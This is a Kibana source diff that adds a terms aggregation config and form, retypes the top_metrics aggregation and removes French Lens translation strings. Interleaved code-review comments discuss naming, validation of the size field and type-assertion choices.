0000000000000..e2e433ee4fbf1 --- /dev/null +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/types.ts @@ -0,0 +1,17 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { PivotAggsConfigWithExtra } from '../../../../../../common/pivot_aggs'; + +export interface PercentilesAggConfig { + /** Comma separated list */ + percents: string; +} +export type IPivotAggsConfigPercentiles = PivotAggsConfigWithExtra< + PercentilesAggConfig, + { field: string; percents: number[] } +>; 
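Review bot: `IPivotAggsConfigPercentiles` introduces an `I`-prefixed type name into a family whose existing members are `PivotAggsConfigTopMetrics` and `PivotAggsConfigFilter` (both visible in other hunks of this diff), and the prefix is not a convention these type aliases follow. Renaming it `PivotAggsConfigPercentiles` — and the new `IPivotAggsConfigTerms` alongside it — keeps all agg config types discoverable by one pattern. The field comment would also help more as `/** Comma separated list of percents as typed into the form; the ES shape below is number[] */`, since the two shapes sit two lines apart and differ in type.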
diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/config.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/config.ts new file mode 100644 index 0000000000000..81222354e34c0 --- /dev/null +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/config.ts @@ -0,0 +1,51 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { TermsAggForm } from './terms_form_component'; +import { + isPivotAggsConfigWithUiBase, + PivotAggsConfigBase, + PivotAggsConfigWithUiBase, + TERMS_AGG_DEFAULT_SIZE, +} from '../../../../../../common/pivot_aggs'; +import { IPivotAggsConfigTerms } from './types'; + +export function getTermsAggConfig( + commonConfig: PivotAggsConfigWithUiBase | PivotAggsConfigBase +): IPivotAggsConfigTerms { + const field = isPivotAggsConfigWithUiBase(commonConfig) ? commonConfig.field : null; + + return { + ...commonConfig, + isSubAggsSupported: false, + isMultiField: false, + AggFormComponent: TermsAggForm, + field, + aggConfig: { + size: TERMS_AGG_DEFAULT_SIZE, + }, + setUiConfigFromEs(esAggDefinition) { + const { field: esField, size } = esAggDefinition; + + this.field = esField; + this.aggConfig.size = size; + }, + getEsAggConfig() { + if (!this.isValid()) { + return null; + } + + return { + field: this.field as string, + size: this.aggConfig.size as number, + }; + }, + isValid() { + return typeof this.aggConfig.size === 'number' && this.aggConfig.size > 0; + }, + }; +} 
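Review bot: `isValid()` accepts any positive number for `size`, but a terms aggregation size has to be a whole number, and the form's `onChange({ size: Number(e.target.value) })` in the terms_form_component hunk will produce `1.5` from the number input; `getEsAggConfig()` then forwards that value unchanged. Tightening the check to `return Number.isInteger(this.aggConfig.size) && this.aggConfig.size > 0;` rejects fractional input in the one place validation lives, after which the `as number` cast in `getEsAggConfig` remains only because TS cannot narrow through `this` and deserves a comment saying so. If an ES definition without an explicit `size` could ever reach `setUiConfigFromEs`, `this.aggConfig.size = size` would also overwrite the default with `undefined` — the declared ES type marks `size` required, so that may be unreachable.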
diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/index.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/index.ts new file mode 100644 index 0000000000000..c3cabe3c32b26 --- /dev/null +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/index.ts @@ -0,0 +1,8 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +export { getTermsAggConfig } from './config'; diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/terms_form_component.tsx b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/terms_form_component.tsx new file mode 100644 index 0000000000000..b500bc7a7a60d --- /dev/null +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/terms_form_component.tsx @@ -0,0 +1,42 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import React from 'react'; +import { i18n } from '@kbn/i18n'; +import { EuiFieldNumber, EuiFormRow } from '@elastic/eui'; +import { IPivotAggsConfigTerms } from './types'; + +export const TermsAggForm: IPivotAggsConfigTerms['AggFormComponent'] = ({ + aggConfig, + onChange, + isValid, +}) => { + return ( + <> + + { + onChange({ size: Number(e.target.value) }); + }} + /> + + + ); +}; 
diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/types.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/types.ts new file mode 100644 index 0000000000000..f2d00ecd50bed --- /dev/null +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/types.ts @@ -0,0 +1,16 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { PivotAggsConfigWithExtra } from '../../../../../../common/pivot_aggs'; + +export interface TermsAggConfig { + size: number; +} +export type IPivotAggsConfigTerms = PivotAggsConfigWithExtra< + TermsAggConfig, + { field: string; size: number } +>; diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/config.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/config.ts index 49be7b299712b..a7e5261ebf86e 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/config.ts +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/config.ts @@ -6,8 +6,10 @@ */ import { isPopulatedObject } from '@kbn/ml-is-populated-object'; + +import type * as estypes from '@elastic/elasticsearch/lib/api/typesWithBodyKey'; import { - isPivotAggsConfigWithUiSupport, + isPivotAggsConfigWithUiBase, isSpecialSortField, isValidSortDirection, isValidSortMode, 
@@ -28,7 +30,7 @@ export function getTopMetricsAggConfig( ...commonConfig, isSubAggsSupported: false, isMultiField: true, - field: isPivotAggsConfigWithUiSupport(commonConfig) ? commonConfig.field : '', + field: isPivotAggsConfigWithUiBase(commonConfig) ? commonConfig.field : '', AggFormComponent: TopMetricsAggForm, aggConfig: {}, getEsAggConfig() { @@ -56,26 +58,37 @@ export function getTopMetricsAggConfig( }, }; } else { - sort = { [sortField!]: sortSettings.order }; + sort = { [sortField!]: sortSettings.order as estypes.SortOrder }; } } return { - metrics: (Array.isArray(this.field) ? this.field : [this.field]).map((f) => ({ field: f })), - sort, + metrics: (Array.isArray(this.field) ? this.field : [this.field]).map((f) => ({ + field: f as string, + })), + sort: sort!, ...(unsupportedConfig ?? {}), }; }, setUiConfigFromEs(esAggDefinition) { const { metrics, sort, ...unsupportedConfig } = esAggDefinition; - this.field = (Array.isArray(metrics) ? metrics : [metrics]).map((v) => v.field); + this.field = (Array.isArray(metrics) ? metrics : [metrics]).map((v) => v!.field); if (isSpecialSortField(sort)) { this.aggConfig.sortField = sort; return; } + if (!sort) { + this.aggConfig = { + ...this.aggConfig, + ...(unsupportedConfig ?? {}), + }; + + return; + } + const sortField = Object.keys(sort)[0]; this.aggConfig.sortField = sortField; diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/index.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/index.ts new file mode 100644 index 0000000000000..edad3879aac1f --- /dev/null +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/index.ts 
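Review bot: The new `if (!sort)` guard in `setUiConfigFromEs` runs after `isSpecialSortField(sort)` has already been called with a possibly undefined `sort`, so unless that helper tolerates `undefined` the guard arrives too late; moving the `!sort` branch above the special-field check makes the order independent of the helper's behaviour. The added `v!.field` and `sort!` assertions silence the checker without a runtime guard: for the metrics list, filtering with a type predicate (`(v): v is estypes.AggregationsTopMetricsValue => v !== undefined`) before `.map((v) => v.field)` drops empty entries instead of throwing on `undefined.field`, and `sort!` should at least carry a comment naming the branch that guarantees it is set. Both `getEsAggConfig` and `setUiConfigFromEs` start before this hunk and the latter continues past it.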
@@ -0,0 +1,8 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +export { getTopMetricsAggConfig } from './config'; diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/types.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/types.ts index a90ee5307a18e..3c7c92dc5e5fb 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/types.ts +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/types.ts @@ -5,6 +5,7 @@ * 2.0. */ +import type * as estypes from '@elastic/elasticsearch/lib/api/typesWithBodyKey'; import type { PivotAggsConfigWithExtra, SortDirection, @@ -18,7 +19,15 @@ export interface TopMetricsAggConfig { order?: SortDirection; mode?: SortMode; numericType?: SortNumericFieldType; + [unsupported: string]: unknown; }; } -export type PivotAggsConfigTopMetrics = PivotAggsConfigWithExtra; +export type PivotAggsConfigTopMetrics = PivotAggsConfigWithExtra< + TopMetricsAggConfig, + { + metrics?: estypes.AggregationsTopMetricsValue | estypes.AggregationsTopMetricsValue[]; + size?: estypes.integer; + sort?: estypes.SortCombinations; + } +>; diff --git a/x-pack/plugins/translations/translations/fr-FR.json b/x-pack/plugins/translations/translations/fr-FR.json index 60eb4ff1a6bc1..dd658cec1d44f 100644 --- a/x-pack/plugins/translations/translations/fr-FR.json +++ b/x-pack/plugins/translations/translations/fr-FR.json 
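Review bot: The `[unsupported: string]: unknown` index signature is added to the nested sort-settings object (the one holding `order`/`mode`/`numericType`), but the companion config.ts hunk merges the unsupported ES keys into `this.aggConfig` itself (`this.aggConfig = { ...this.aggConfig, ...(unsupportedConfig ?? {}) }` in the `!sort` branch), so at least for that path the signature documents the wrong level and leaves the top-level pass-through keys untyped. A broad index signature on an otherwise precise interface also makes any misspelled sort-settings key type-check as `unknown` instead of erroring. Consider an explicit pass-through slot instead, e.g. `unsupported?: Record<string, unknown>;` on `TopMetricsAggConfig`, and storing `unsupportedConfig` there in `setUiConfigFromEs`; whether other parts of that method write into the sort-settings object is not visible here.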
@@ -76,952 +76,21 @@ } }, "messages": { - "xpack.lens.formula.absFunction.markdown": "\nCalcule une valeur absolue. Une valeur négative est multipliée par -1, une valeur positive reste identique.\n\nExemple : calculer la distance moyenne par rapport au niveau de la mer \"abs(average(altitude))\"\n ", - "xpack.lens.formula.addFunction.markdown": "\nAjoute jusqu'à deux nombres.\nFonctionne également avec le symbole \"+\".\n\nExemple : calculer la somme de deux champs\n\n\"sum(price) + sum(tax)\"\n\nExemple : compenser le compte par une valeur statique\n\n\"add(count(), 5)\"\n ", - "xpack.lens.formula.cbrtFunction.markdown": "\nÉtablit la racine carrée de la valeur.\n\nExemple : calculer la longueur du côté à partir du volume\n`cbrt(last_value(volume))`\n ", - "xpack.lens.formula.ceilFunction.markdown": "\nArrondit le plafond de la valeur au chiffre supérieur.\n\nExemple : arrondir le prix au dollar supérieur\n`ceil(sum(price))`\n ", - "xpack.lens.formula.clampFunction.markdown": "\nÉtablit une limite minimale et maximale pour la valeur.\n\nExemple : s'assurer de repérer les valeurs aberrantes\n```\nclamp(\n average(bytes),\n percentile(bytes, percentile=5),\n percentile(bytes, percentile=95)\n)\n```\n", - "xpack.lens.formula.cubeFunction.markdown": "\nCalcule le cube d'un nombre.\n\nExemple : calculer le volume à partir de la longueur du côté\n`cube(last_value(length))`\n ", - "xpack.lens.formula.divideFunction.markdown": "\nDivise le premier nombre par le deuxième.\nFonctionne également avec le symbole \"/\".\n\nExemple : calculer la marge bénéficiaire\n\"sum(profit) / sum(revenue)\"\n\nExemple : \"divide(sum(bytes), 2)\"\n ", - "xpack.lens.formula.expFunction.markdown": "\nÉlève *e* à la puissance n.\n\nExemple : calculer la fonction exponentielle naturelle\n\n`exp(last_value(duration))`\n ", - "xpack.lens.formula.fixFunction.markdown": "\nPour les valeurs positives, part du bas. 
Pour les valeurs négatives, part du haut.\n\nExemple : arrondir à zéro\n\"fix(sum(profit))\"\n ", - "xpack.lens.formula.floorFunction.markdown": "\nArrondit à la valeur entière inférieure la plus proche.\n\nExemple : arrondir un prix au chiffre inférieur\n\"floor(sum(price))\"\n ", - "xpack.lens.formula.logFunction.markdown": "\nÉtablit un logarithme avec base optionnelle. La base naturelle *e* est utilisée par défaut.\n\nExemple : calculer le nombre de bits nécessaire au stockage de valeurs\n```\nlog(sum(bytes))\nlog(sum(bytes), 2)\n```\n ", - "xpack.lens.formula.modFunction.markdown": "\nÉtablit le reste après division de la fonction par un nombre.\n\nExemple : calculer les trois derniers chiffres d'une valeur\n\"mod(sum(price), 1000)\"\n ", - "xpack.lens.formula.multiplyFunction.markdown": "\nMultiplie deux nombres.\nFonctionne également avec le symbole \"*\".\n\nExemple : calculer le prix après application du taux d'imposition courant\n`sum(bytes) * last_value(tax_rate)`\n\nExemple : calculer le prix après application du taux d'imposition constant\n\"multiply(sum(price), 1.2)\"\n ", - "xpack.lens.formula.powFunction.markdown": "\nÉlève la valeur à une puissance spécifique. 
Le deuxième argument est obligatoire.\n\nExemple : calculer le volume en fonction de la longueur du côté\n\"pow(last_value(length), 3)\"\n ", - "xpack.lens.formula.roundFunction.markdown": "\nArrondit à un nombre donné de décimales, 0 étant la valeur par défaut.\n\nExemples : arrondir au centième\n```\nround(sum(bytes))\nround(sum(bytes), 2)\n```\n ", - "xpack.lens.formula.sqrtFunction.markdown": "\nÉtablit la racine carrée d'une valeur positive uniquement.\n\nExemple : calculer la longueur du côté en fonction de la surface\n`sqrt(last_value(area))`\n ", - "xpack.lens.formula.squareFunction.markdown": "\nÉlève la valeur à la puissance 2.\n\nExemple : calculer l’aire en fonction de la longueur du côté\n`square(last_value(length))`\n ", - "xpack.lens.formula.subtractFunction.markdown": "\nSoustrait le premier nombre du deuxième.\nFonctionne également avec le symbole \"-\".\n\nExemple : calculer la plage d'un champ\n\"subtract(max(bytes), min(bytes))\"\n ", - "xpack.lens.formulaDocumentation.filterRatioDescription.markdown": "### Rapport de filtre :\n\nUtilisez \"kql=''\" pour filtrer un ensemble de documents et le comparer à d'autres documents du même regroupement.\nPar exemple, pour consulter l'évolution du taux d'erreur au fil du temps :\n\n```\ncount(kql='response.status_code > 400') / count()\n```\n ", - "xpack.lens.formulaDocumentation.percentOfTotalDescription.markdown": "### Pourcentage du total\n\nLes formules peuvent calculer \"overall_sum\" pour tous les regroupements,\nce qui permet de convertir chaque regroupement en un pourcentage du total :\n\n```\nsum(products.base_price) / overall_sum(sum(products.base_price))\n```\n ", - "xpack.lens.formulaDocumentation.weekOverWeekDescription.markdown": "### Semaine après semaine :\n\nUtilisez \"shift='1w'\" pour obtenir la valeur de chaque regroupement\nde la semaine précédente. 
Le décalage ne doit pas être utilisé avec la fonction *Valeurs les plus élevées*.\n\n```\npercentile(system.network.in.bytes, percentile=99) /\npercentile(system.network.in.bytes, percentile=99, shift='1w')\n```\n ", - "xpack.lens.indexPattern.cardinality.documentation.markdown": "\nCalcule le nombre de valeurs uniques d'un champ donné. Fonctionne pour les nombres, les chaînes, les dates et les valeurs booléennes.\n\nExemple : calculer le nombre de produits différents :\n`unique_count(product.name)`\n\nExemple : calculer le nombre de produits différents du groupe \"clothes\" :\n\"unique_count(product.name, kql='product.group=clothes')\"\n ", - "xpack.lens.indexPattern.count.documentation.markdown": "\nCalcule le nombre de documents.\n\nExemple : calculer le nombre de documents :\n\"count()\"\n\nExemple : calculer le nombre de documents correspondant à un filtre spécifique :\n\"count(kql='price > 500')\"\n ", - "xpack.lens.indexPattern.counterRate.documentation.markdown": "\nCalcule le taux d'un compteur toujours croissant. Cette fonction renvoie uniquement des résultats utiles inhérents aux champs d'indicateurs de compteur qui contiennent une mesure quelconque à croissance régulière.\nSi la valeur diminue, elle est interprétée comme une mesure de réinitialisation de compteur. Pour obtenir des résultats plus précis, \"counter_rate\" doit être calculé d’après la valeur \"max\" du champ.\n\nCe calcul est réalisé séparément pour des séries distinctes définies par des filtres ou des dimensions de valeurs supérieures.\nIl utilise l'intervalle en cours utilisé dans la formule.\n\nExemple : visualiser le taux d'octets reçus au fil du temps par un serveur Memcached :\n`counter_rate(max(memcached.stats.read.bytes))`\n ", - "xpack.lens.indexPattern.cumulativeSum.documentation.markdown": "\nCalcule la somme cumulée d'un indicateur au fil du temps, en ajoutant toutes les valeurs précédentes d'une série à chaque valeur. 
Pour utiliser cette fonction, vous devez également configurer une dimension de l'histogramme de dates.\n\nCe calcul est réalisé séparément pour des séries distinctes définies par des filtres ou des dimensions de valeurs supérieures.\n\nExemple : visualiser les octets reçus cumulés au fil du temps :\n`cumulative_sum(sum(bytes))`\n ", - "xpack.lens.indexPattern.differences.documentation.markdown": "\nCalcule la différence par rapport à la dernière valeur d'un indicateur au fil du temps. Pour utiliser cette fonction, vous devez également configurer une dimension de l'histogramme de dates.\nLes données doivent être séquentielles pour les différences. Si vos données sont vides lorsque vous utilisez des différences, essayez d'augmenter l'intervalle de l'histogramme de dates.\n\nCe calcul est réalisé séparément pour des séries distinctes définies par des filtres ou des dimensions de valeurs supérieures.\n\nExemple : visualiser la modification des octets reçus au fil du temps :\n`differences(sum(bytes))`\n ", - "xpack.lens.indexPattern.lastValue.documentation.markdown": "\nRenvoie la valeur d'un champ du dernier document, triée par le champ d'heure par défaut de la vue de données.\n\nCette fonction permet de récupérer le dernier état d'une entité.\n\nExemple : obtenir le statut actuel du serveur A :\n`last_value(server.status, kql='server.name=\"A\"')`\n ", - "xpack.lens.indexPattern.metric.documentation.markdown": "\nRenvoie l'indicateur {metric} d'un champ. Cette fonction fonctionne uniquement pour les champs numériques.\n\nExemple : obtenir l'indicateur {metric} d'un prix :\n\"{metric}(price)\"\n\nExemple : obtenir l'indicateur {metric} d'un prix pour des commandes du Royaume-Uni :\n\"{metric}(price, kql='location:UK')\"\n ", - "xpack.lens.indexPattern.movingAverage.documentation.markdown": "\nCalcule la moyenne mobile d'un indicateur au fil du temps, en prenant la moyenne des n dernières valeurs pour calculer la valeur actuelle. 
Pour utiliser cette fonction, vous devez également configurer une dimension de l'histogramme de dates.\nLa valeur de fenêtre par défaut est {defaultValue}.\n\nCe calcul est réalisé séparément pour des séries distinctes définies par des filtres ou des dimensions de valeurs supérieures.\n\nPrend un paramètre nommé \"window\" qui spécifie le nombre de dernières valeurs à inclure dans le calcul de la moyenne de la valeur actuelle.\n\nExemple : lisser une ligne de mesures :\n`moving_average(sum(bytes), window=5)`\n ", - "xpack.lens.indexPattern.overall_average.documentation.markdown": "\nCalcule la moyenne d'un indicateur pour tous les points de données d'une série dans le graphique actuel. Une série est définie par une dimension à l'aide d'un histogramme de dates ou d'une fonction d'intervalle.\nD'autres dimensions permettant de répartir les données telles que les valeurs supérieures ou les filtres sont traitées en tant que séries distinctes.\n\nSi le graphique actuel n'utilise aucun histogramme de dates ou aucune fonction d'intervalle, \"overall_average\" calcule la moyenne pour toutes les dimensions, quelle que soit la fonction utilisée.\n\nExemple : écart par rapport à la moyenne :\n\"sum(bytes) - overall_average(sum(bytes))\"\n ", - "xpack.lens.indexPattern.overall_max.documentation.markdown": "\nCalcule la valeur maximale d'un indicateur pour tous les points de données d'une série dans le graphique actuel. 
Une série est définie par une dimension à l'aide d'un histogramme de dates ou d'une fonction d'intervalle.\nD'autres dimensions permettant de répartir les données telles que les valeurs supérieures ou les filtres sont traitées en tant que séries distinctes.\n\nSi le graphique actuel n'utilise aucun histogramme de dates ou aucune fonction d'intervalle, \"overall_max\" calcule la valeur maximale pour toutes les dimensions, quelle que soit la fonction utilisée.\n\nExemple : pourcentage de plage\n\"(sum(bytes) - overall_min(sum(bytes))) / (overall_max(sum(bytes)) - overall_min(sum(bytes)))\"\n ", - "xpack.lens.indexPattern.overall_min.documentation.markdown": "\nCalcule la valeur minimale d'un indicateur pour tous les points de données d'une série dans le graphique actuel. Une série est définie par une dimension à l'aide d'un histogramme de dates ou d'une fonction d'intervalle.\nD'autres dimensions permettant de répartir les données telles que les valeurs supérieures ou les filtres sont traitées en tant que séries distinctes.\n\nSi le graphique actuel n'utilise aucun histogramme de dates ou aucune fonction d'intervalle, \"overall_min\" calcule la valeur minimale pour toutes les dimensions, quelle que soit la fonction utilisée.\n\nExemple : pourcentage de plage\n\"(sum(bytes) - overall_min(sum(bytes)) / (overall_max(sum(bytes)) - overall_min(sum(bytes)))\"\n ", - "xpack.lens.indexPattern.overall_sum.documentation.markdown": "\nCalcule la somme d'un indicateur pour tous les points de données d'une série dans le graphique actuel. 
Une série est définie par une dimension à l'aide d'un histogramme de dates ou d'une fonction d'intervalle.\nD'autres dimensions permettant de répartir les données telles que les valeurs supérieures ou les filtres sont traitées en tant que séries distinctes.\n\nSi le graphique actuel n'utilise aucun histogramme de dates ou aucune fonction d'intervalle, \"overall_sum\" calcule la somme pour toutes les dimensions, quelle que soit la fonction utilisée.\n\nExemple : pourcentage de total\n\"sum(bytes) / overall_sum(sum(bytes))\"\n ", - "xpack.lens.indexPattern.percentile.documentation.markdown": "\nRenvoie le centile spécifié des valeurs d'un champ. Il s'agit de la valeur de n pour cent des valeurs présentes dans les documents.\n\nExemple : obtenir le nombre d'octets supérieurs à 95 % des valeurs :\n`percentile(bytes, percentile=95)`\n ", - "xpack.lens.indexPattern.time_scale.documentation.markdown": "\n\nCette fonction avancée est utile pour normaliser les comptes et les sommes sur un intervalle de temps spécifique. 
Elle permet l'intégration avec les indicateurs qui sont stockés déjà normalisés sur un intervalle de temps spécifique.\n\nVous pouvez faire appel à cette fonction uniquement si une fonction d'histogramme des dates est utilisée dans le graphique actuel.\n\nExemple : Un rapport comparant un indicateur déjà normalisé à un autre indicateur devant être normalisé.\n\"normalize_by_unit(counter_rate(max(system.diskio.write.bytes)), unit='s') / last_value(apache.status.bytes_per_second)\"\n ", - "xpack.lens.advancedSettings.useFieldExistenceSampling.description": "Lorsque cette option est activée, l’échantillonnage de document est utilisé pour déterminer l’existence des champs (disponibles ou vides) pour la liste de champs Lens au lieu de se fonder sur les mappings d’index.", - "xpack.lens.advancedSettings.useFieldExistenceSampling.title": "Utiliser l’échantillonnage d’existence des champs", - "xpack.lens.app.addToLibrary": "Enregistrer dans la bibliothèque", - "xpack.lens.app.cancel": "Annuler", - "xpack.lens.app.cancelButtonAriaLabel": "Retour à la dernière application sans enregistrer les modifications", - "xpack.lens.app.docLoadingError": "Erreur lors du chargement du document enregistré", - "xpack.lens.app.downloadButtonAriaLabel": "Télécharger les données en fichier CSV", - "xpack.lens.app.downloadButtonFormulasWarning": "Votre fichier CSV contient des caractères que les applications de feuilles de calcul pourraient considérer comme des formules.", - "xpack.lens.app.downloadCSV": "Télécharger au format CSV", - "xpack.lens.app.exploreDataInDiscover": "Explorer les données dans Discover", - "xpack.lens.app.exploreDataInDiscoverDrilldown": "Ouvrir dans Discover", - "xpack.lens.app.exploreDataInDiscoverDrilldown.newTabConfig": "Ouvrir dans un nouvel onglet", - "xpack.lens.app.goBackLabel": "Retour vers {contextOriginatingApp}", - "xpack.lens.app.goBackModalCancelBtn": "Annuler", - "xpack.lens.app.goBackModalMessage": "Les modifications que vous avez effectuées ici ne sont 
pas rétrocompatibles avec votre visualisation {contextOriginatingApp} d’origine. Êtes-vous sûr de vouloir abandonner ces modifications non enregistrées et revenir à {contextOriginatingApp} ?", - "xpack.lens.app.goBackModalTitle": "Abandonner les modifications ?", - "xpack.lens.app.inspect": "Inspecter", - "xpack.lens.app.inspectAriaLabel": "inspecter", - "xpack.lens.app.lensContext": "Contexte Lens ({language})", - "xpack.lens.app.save": "Enregistrer", - "xpack.lens.app.saveAndReturn": "Enregistrer et revenir", - "xpack.lens.app.saveAndReturnButtonAriaLabel": "Enregistrer la visualisation Lens en cours et revenir à l'application précédente", - "xpack.lens.app.saveAs": "Enregistrer sous", - "xpack.lens.app.saveButtonAriaLabel": "Enregistrer la visualisation Lens en cours", - "xpack.lens.app.saveModalType": "Visualisation Lens", - "xpack.lens.app.saveVisualization.successNotificationText": "\"{visTitle}\" enregistré", - "xpack.lens.app.settings": "Paramètres", - "xpack.lens.app.settingsAriaLabel": "Ouvrir le menu de paramètres Lens", - "xpack.lens.app.showUnderlyingDataMultipleLayers": "Impossible d’afficher les données sous-jacentes pour les visualisations avec plusieurs calques.", - "xpack.lens.app.showUnderlyingDataNoData": "La visualisation ne comprend aucune donnée disponible à afficher.", - "xpack.lens.app.showUnderlyingDataTimeShifts": "Impossible d’afficher les données sous-jacentes lorsqu’un décalage temporel est configuré.", - "xpack.lens.app.showUnderlyingDataUnsupportedDatasource": "Les données sous-jacentes sont incompatibles avec la source de données actuelle.", - "xpack.lens.app.unsavedFilename": "non enregistré", - "xpack.lens.app.unsavedWorkConfirmBtn": "Abandonner les modifications", - "xpack.lens.app.unsavedWorkMessage": "Quitter Lens avec un travail non enregistré ?", - "xpack.lens.app.unsavedWorkTitle": "Modifications non enregistrées", - "xpack.lens.app.updatePanel": "Mettre à jour le panneau sur {originatingAppName}", - "xpack.lens.app404": 
"404 Page introuvable", - "xpack.lens.appName": "Visualisation Lens", - "xpack.lens.breadcrumbsByValue": "Modifier la visualisation", - "xpack.lens.breadcrumbsCreate": "Créer", - "xpack.lens.breadcrumbsTitle": "Bibliothèque Visualize", - "xpack.lens.chart.labelVisibility.auto": "Auto", - "xpack.lens.chart.labelVisibility.custom": "Personnalisé", - "xpack.lens.chart.labelVisibility.none": "Aucun", - "xpack.lens.chartSwitch.dataLossDescription": "La sélection de ce type de visualisation entraîne la suppression des options de configuration incompatibles et des calques multiples, le cas échéant.", - "xpack.lens.chartSwitch.dataLossLabel": "Avertissement", - "xpack.lens.chartSwitch.experimentalLabel": "Version d’évaluation technique", - "xpack.lens.chartSwitch.noResults": "Résultats introuvables pour {term}.", - "xpack.lens.chartTitle.unsaved": "Visualisation non enregistrée", - "xpack.lens.chartWarnings.number": "{warningsCount, plural, one {avertissement} other {avertissements}}", - "xpack.lens.collapse.avg": "Moyenne", - "xpack.lens.collapse.infoIcon": "Ne pas afficher cette dimension dans la visualisation et agréger toutes les valeurs d'indicateurs ayant la même valeur pour cette dimension en un nombre unique.", - "xpack.lens.collapse.label": "Réduire par", - "xpack.lens.collapse.max": "Max.", - "xpack.lens.collapse.min": "Min.", - "xpack.lens.collapse.none": "Aucun", - "xpack.lens.collapse.sum": "Somme", - "xpack.lens.configPanel.addLayerButton": "Ajouter un calque", - "xpack.lens.configPanel.color.tooltip.auto": "Lens choisit automatiquement des couleurs à votre place sauf si vous spécifiez une couleur personnalisée.", - "xpack.lens.configPanel.color.tooltip.custom": "Effacez la couleur personnalisée pour revenir au mode \"Auto\".", - "xpack.lens.configPanel.color.tooltip.disabled": "Les séries individuelles n'acceptent pas les couleurs personnalisées lorsque le calque inclut l'option \"Répartir par\".", - "xpack.lens.configPanel.experimentalLabel": "Version 
d'évaluation technique", - "xpack.lens.configPanel.selectLayerType": "Sélectionner le type de calque", - "xpack.lens.configPanel.selectVisualization": "Sélectionner une visualisation", - "xpack.lens.configPanel.visualizationType": "Type de visualisation", - "xpack.lens.configure.configurePanelTitle": "{groupLabel}", - "xpack.lens.configure.editConfig": "Modifier la configuration {label}", - "xpack.lens.configure.emptyConfig": "Ajouter ou glisser-déposer un champ", - "xpack.lens.configure.emptyConfigClick": "Ajouter une annotation", - "xpack.lens.configure.invalidBottomReferenceLineDimension": "La ligne de référence est affectée à un axe qui n’existe plus ou qui n’est plus valide. Vous pouvez déplacer cette ligne de référence vers un autre axe disponible ou la supprimer.", - "xpack.lens.configure.invalidConfigTooltip": "Configuration non valide.", - "xpack.lens.configure.invalidConfigTooltipClick": "Cliquez pour en savoir plus.", - "xpack.lens.configure.invalidReferenceLineDimension": "La ligne de référence est affectée à un axe qui n’existe plus. Vous pouvez déplacer cette ligne de référence vers un autre axe disponible ou la supprimer.", - "xpack.lens.configure.suggestedValuee": "Valeur suggérée : {value}", - "xpack.lens.confirmModal.cancelButtonLabel": "Annuler", - "xpack.lens.confirmModal.saveDuplicateButtonLabel": "Enregistrer {name}", - "xpack.lens.confirmModal.saveDuplicateConfirmationMessage": "Il y a déjà une occurrence de {name} avec le titre \"{title}\". Voulez-vous tout de même enregistrer ?", - "xpack.lens.customBucketContainer.dragToReorder": "Faire glisser pour réorganiser", - "xpack.lens.dataPanelWrapper.switchDatasource": "Basculer vers la source de données", - "xpack.lens.datatable.addLayer": "Visualisation", - "xpack.lens.datatable.breakdownColumns": "Colonnes", - "xpack.lens.datatable.breakdownColumns.description": "Divisez les colonnes d'indicateurs par champ. 
